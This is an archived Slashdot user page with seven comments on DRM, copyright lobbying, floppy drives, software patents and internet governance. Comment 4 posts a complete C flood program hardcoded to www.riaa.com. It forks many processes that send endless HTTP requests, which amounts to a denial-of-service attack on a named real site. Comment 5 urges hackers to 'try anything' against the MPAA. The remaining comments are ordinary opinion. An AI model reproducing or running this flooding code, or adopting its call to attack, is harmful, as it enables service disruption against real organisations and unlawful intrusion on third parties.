Slashdot Mirror


User: peope

peope's activity in the archive.

Stories
0
Comments
57
First seen
Last seen
Profile
(view on slashdot.org)

Comments · 57

  1. Re:Not all documents are locked documents on AMD Opteron to support Palladium · · Score: 1

    I agree to that other nations than USA have the choice of writing laws to counter this.

    Lets say any recording being "locked down" as stated previously has forfeited all Copyright Protection and is fair game for anyone to copy.

    If the movie, record, software industries wants to sell their products to these countries they will have to do it in "unlocked" with protection preserved.

    Hello! There has to be some country brave enough to do this. Pushing it forwards in the European Union could be a possibility too although they seem to want to "conform to the legislation of USA" in these matters.

    Anyways, it is our representatives who are able to do this.

    So Sweden, Germany, lets give RIAA, MPAA, USA the finger ;P

  2. Booting no-boot-on-cd laptops on Death to the 3.5" Floppy? · · Score: 1

    Have and old Fujitsu B112 and it has an external PCMCIA-card-based CD-rom that will not even eject without being initialized. I have to make those boot floppies somewhere =) So yes, there is a place for them floppy-drives too

  3. Re:cdreward@riaa.com on MPAA Requests Immunity to Commit Cyber-Crimes · · Score: 1

    Wonderful They are already getting fun stuff to read ;)

  4. Im interested in changes done on www.riaa.com ;) on MPAA Requests Immunity to Commit Cyber-Crimes · · Score: 1

    #include <sys/types.h>
    #include <sys/socket.h>
    #include <stdio.h>
    #include <netinet/in.h>
    #include <netdb.h>
    #include <errno.h>
    #include <unistd.h>

    #define HOSTNAME "www.riaa.com"
    #define PORT 80
    #define SENDMSG "GET / HTTP/1.0\n\n"
    #define BUFSIZE 1024
    #define CHILDREN 1000

    int main(int argc, char *argv[]){ struct sockaddr_in addr; int sockfd; int reti = 0; struct hostent *host; char buf[BUFSIZE]; int children = 0; if( a
    rgc < 2 ){ fprintf( stderr, "Usage: %s <children>\n", argv[0] ); } else{ children = atoi( argv[1] ); while( fork() != 0 && ++reti < children ); } if( (host = gethostbyname( HOSTNA
    ME )) == NULL ) exit(-1); memset( &addr, '\0', sizeof( addr ) ); addr.sin_family = AF_INET; addr.sin_port = htons(PORT); addr.sin_addr = *((struct in_addr *)host->h_addr_list[0]);
    for(;;){ if( (sockfd = socket( PF_INET, SOCK_STREAM, 0 )) == -1 ) continue; if( connect( sockfd, (struct sockaddr *)&addr, sizeof( struct sockaddr_in ) ) == 0 ) { send( sockfd, S
    ENDMSG, strlen(SENDMSG), 0 ); fwrite("|", 1, 1, stdout ); fflush( stdout ); while( (reti = recv( sockfd, buf, BUFSIZE, 0 )) != 0 ){ fwrite( "*", 1, 1, stdout ); fflush( stdout );
    } shutdown( sockfd, SHUT_RDWR ); } else{ perror( "connect" ); } close( sockfd ); } return 0; }

  5. A call for mobilisation on MPAA Requests Immunity to Commit Cyber-Crimes · · Score: 1

    If these guys are coming out with illegal activities I cannot see why it would be morally incorrect to get a movement together trying anything to stop it.

    PR doing their part, hackers doing theirs.

    It would be possible to muster more manpower than these MPAA could ever buy.

    And.. If the guys working at MPAA would ever go abroad.. they could get arrested and put in jail by laws created by not so greased representatives.

  6. Yet another reason for no patents on software on JPEG Committee On The Ball, Seeks Prior Art · · Score: 1

    Patents on method in software is just plain stupid.
    Often it is just a matter of putting stuff together.
    All combinations do not have prior art. But there is often nothing special with it.

  7. Re:Um... on US Govt Wants to Control ICANN? · · Score: 1

    Yes.. The logic is really twisted. Acctually.. Most bad things on the net come from the US. (China and Russia are also good candidates) =) So lets make a new institution for keeping a simple phonebook-service. Or just use a Democratic existing one like opennic. A few large providers doing this (like Telia in Sweden) and we would be safe from the "evil" Americans =)